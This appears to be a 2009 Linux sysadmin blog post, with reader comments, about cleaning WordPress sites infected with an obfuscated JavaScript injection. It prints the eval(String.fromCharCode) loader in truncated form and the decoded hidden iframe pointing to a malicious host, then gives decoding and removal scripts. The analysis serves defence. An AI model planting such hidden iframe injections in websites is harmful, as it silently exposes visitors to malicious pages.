Linux Sysadmin Blog

HEUR:Trojan.Script.Iframe

March 22nd, 2009 · 67 Comments · News, Security

One of my friends asked for help with a virus appearing on his sites (mostly WordPress sites). I checked it out and my Kaspersky Internet Security blocked the pages from loading, so I downloaded the files manually and scanned the HTML with Kaspersky to determine the affected files.

I noticed that the affected files were PHP and HTML only, and if you compare the code of the original WordPress files with the infected ones you will see the difference. Below are samples of the added code:

HTML files: <script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>
PHP files:  <?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>'; ?>

What it does
I’m not a virus expert, but I was curious about what this portion of code does, so I looked at it. In our case the decoded text adds this code to the HTML or PHP files:

var fggge3="si";
var w345="pl";
var re6="ank.";
var rr="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one">');
var t=00001217

and you can see it tries to load an iframe:

<iframe src=http://siplank.com/qqp/ style=display:none>
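The two stages above can be worked out statically instead of running the script. The following Python is an added example, not code from the original post: it maps the fromCharCode code points back to text and then substitutes the string variables into the document.write() argument, so no JavaScript is ever executed. The sample file content is constructed here from the second-stage script quoted above.

```python
import re

# Stage 1: the loader exactly as it sits in the infected HTML/PHP files.
LOADER_RE = re.compile(r"eval\(String\.fromCharCode\(([\d,\s]+)\)\)")
# Stage 2 pieces: the string variables and the document.write() argument.
VAR_RE = re.compile(r"""var\s+(\w+)\s*=\s*(['"])(.*?)\2\s*;""")
WRITE_RE = re.compile(r"document\.write\((.*?)\)")
TOKEN_RE = re.compile(r"""'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|([A-Za-z_]\w*)""")


def decode_fromcharcode(blob):
    """Map the code points inside eval(String.fromCharCode(...)) back to text; None if absent."""
    m = LOADER_RE.search(blob)
    if not m:
        return None
    return "".join(chr(int(n)) for n in m.group(1).split(","))


def resolve_document_write(stage2):
    """Rebuild what document.write() would emit by substituting the var values."""
    env = {name: value for name, _quote, value in VAR_RE.findall(stage2)}
    m = WRITE_RE.search(stage2)
    if not m:
        return ""
    parts = []
    for single, double, ident in TOKEN_RE.findall(m.group(1)):
        # An identifier with no var assignment is left marked rather than guessed.
        parts.append(env.get(ident, "<?" + ident + "?>") if ident else (single or double))
    return "".join(parts)


def decode_injection(blob):
    """Full static decode: the hidden HTML the loader would write, or None if clean."""
    stage2 = decode_fromcharcode(blob)
    return resolve_document_write(stage2) if stage2 else None


# Constructed sample: the second-stage script quoted in the post, re-encoded the way
# the infected files carry it (the host is the one named in the post).
STAGE2 = (
    'var fggge3="si";var w345="pl";var re6="ank.";var rr="com";var a="if";var s="tt";'
    "document.write('<'+a+'rame src=\"h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'"
    "+''+''+'\" style=\"d'+'isplay:n'+'one\">');var t=00001217"
)
SAMPLE_HTML = (
    '<p>Hello world</p><script type="text/javascript">eval(String.fromCharCode('
    + ",".join(str(ord(c)) for c in STAGE2)
    + "))</script>"
)
```

Running decode_injection on an infected file's contents yields the same hidden iframe tag shown above, which is what to look for in the page source when the antivirus alert alone is not conclusive.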

Virus Removal
You can remove the virus by just deleting the code (sample above) from the affected files. If you need to clean up hundreds of infected files (in our case more than 800) you can do the following:

- Get the list of infected files. You can use grep to search for them (-l prints only the matching file names, one per line, so the list can be fed to the loop below):
grep -l -R "eval(String.fromCharCode(118,97,114" /path/to/site/* >> affected_file_list.txt
- Delete the code using perl (or sed). Repeat the commands for every file:
perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//'  /path/to/affected/file.htm
perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//"  /path/to/affected/file.php

Or create a bash/shell script to do the cleanup at once:

#!/bin/sh
# Run the two perl substitutions on every file listed by the grep above.
# -r and the quoted "$line" keep file names with backslashes or spaces intact.
while IFS= read -r line
do
    perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//' "$line"
    perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//" "$line"
done < affected_file_list.txt
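A cleanup pass equivalent to the grep/perl loop above, as an added Python example that is not part of the original post: it strips the bare script tag from HTML files and the whole <?php echo '...'; ?> wrapper from PHP files in one pass, keeps a .bak copy of anything it changes, and defaults to a dry run that only reports. It assumes the loader's script tag reads exactly as shown in the post and that the wrapper is the single-quoted echo form quoted above.

```python
import os
import re
import shutil

# The loader as injected into HTML files, and the PHP echo wrapper around it.
SCRIPT_RE = re.compile(
    r'<script type="text/javascript">eval\(String\.fromCharCode\([\d,\s]+\)\)</script>'
)
PHP_RE = re.compile(r"<\?php echo '" + SCRIPT_RE.pattern + r"'; \?>")


def clean_text(text):
    """Return (cleaned_text, removals). PHP wrappers go first so no empty echo is left."""
    cleaned, n_php = PHP_RE.subn("", text)
    cleaned, n_html = SCRIPT_RE.subn("", cleaned)
    return cleaned, n_php + n_html


def clean_tree(root, dry_run=True, exts=(".php", ".htm", ".html")):
    """Walk root; report {path: removals} and, unless dry_run, rewrite with a .bak copy."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)  # whole path, so spaces in names are safe
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            cleaned, removed = clean_text(text)
            if not removed:
                continue
            report[path] = removed
            if not dry_run:
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return report


if __name__ == "__main__":
    import sys
    # Usage: python clean_iframe.py /path/to/site [--fix]
    for path, n in clean_tree(sys.argv[1], dry_run="--fix" not in sys.argv).items():
        print(n, path)
```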

That’s all.

I don’t know how the attacker gained access to the files and inserted the code, because the file permissions are OK – maybe they gained FTP access.

About gerold

Gerold Mercadero has written 53 posts on this blog.

67 Comments so far ↓

  • Murat Demirten

    I have just a simple Ruby script; it uses the Nokogiri gem and parses files as XML, so alternative multi-line writings of script or iframe code can be caught and corrected. Maybe it can help someone too:
    http://linux-tips.org/article/97/multi-conditional-search-and-replace-clearing-a-ftp-trojan-script-example

  • ArKu Studio

    Well, first of all, sorry for my bad English.

    I work at a company which is based on web technology, and we were working on 5 sites on Monday, and all those 5 sites were infected, which I cannot say for other clients (they are not infected). We have scanned our PCs with Kaspersky, BitDefender, Norton Internet Security and Norton Antivirus, AVG, Avista, McAfee and Nod, and none of them found a virus on our PCs.

    Can anyone tell me CLEARLY whether the problem is in our PCs, or where this problem is?

    PS: we have also changed the FTP passwords, but no success yet.

  • gerold

    @ArKUStudio – based on the discussions and comments above, I think it’s better if you clean up your sites/code, change the FTP passwords, and scan the PCs of those who have access to FTP. After that, monitor your site; if the virus returns, check the FTP logs. Also, review file/directory permissions to see if they are world-writable.

  • Chris

    Hello,

    It seems Kaspersky is blocking my company’s website due to a trojan.

    Can anyone tell me if it actually is infected? We will need to fix it ASAP if so.

  • gerold

    @Chris – if you receive a Trojan alert from Kaspersky when you visit your site, it’s infected – you need to check your code for new lines added or replaced.

  • scentsy

    Very good post, thanks for posting. Are you considering putting up a lot more reports like this one?

  • amrikarisma

    Scary, but a good post. :D

  • Adam Saad

    Hi all,
    I am also having the same problem with more than 10 of my sites, and the only solution I have found so far is manual removal of the code from the HTML or PHP files.

    Does anyone have an idea how to prevent this code injection?

  • ITRCP SOFT

    Many of the websites say that it’s a virus infection, but I think it’s code injection; what we need is a solution for how to make our websites secure from this code injection.

  • Adam Saad

    Dear all, I got the solution to the problem: just make a backup of all the index and login files and put in code to replace the file if there is any change in the code, and you are done. Now the hacker can’t do anything any more.

  • Adam Saad

    Yes, it’s great. Adam is saying it right: this way the hacker will keep attacking but your site will not be affected, and that’s all.

  • will

    Removing some of this same virus… it seems to be an old version of WordPress with an out-of-date timthumb.php, which allows upload of .pl or .js files to the file_upload directory. Once the script is uploaded, you can then write, change permissions, etc., which then leads to iframes etc.

    Make sure to check all temp folders and image upload folders and remove any .pl or .js files in there. Also check the code in any .js files in a WordPress install, as 99% of the time they are supposed to be PHP or have been added by an attacker.

  • Alexander

    Hi there
    Happy New Year
    Are you offering a service to clean up some pages we run?
    Greetings
    Alexander

  • Katrina

    @Gerald – Just because it pops up on Kaspersky doesn’t always mean it’s infected… Kaspersky will deny something and turn it into an inactive virus. Kaspersky support provided the information with numerous screenshots.

  • gerold

    @Katrina – I agree, Kaspersky sometimes detects scripts (e.g. PHP) as viruses or dangerous even if they’re not. Of course it’s better to look at the script itself if you doubt the Kaspersky result.

    This is also true of other antivirus suites. Thanks for pointing this out!

  • Roofing Manchester

    In my opinion, just because it pops up on Kaspersky doesn’t always mean it’s infected; sometimes it pops up a window to stop scripting.
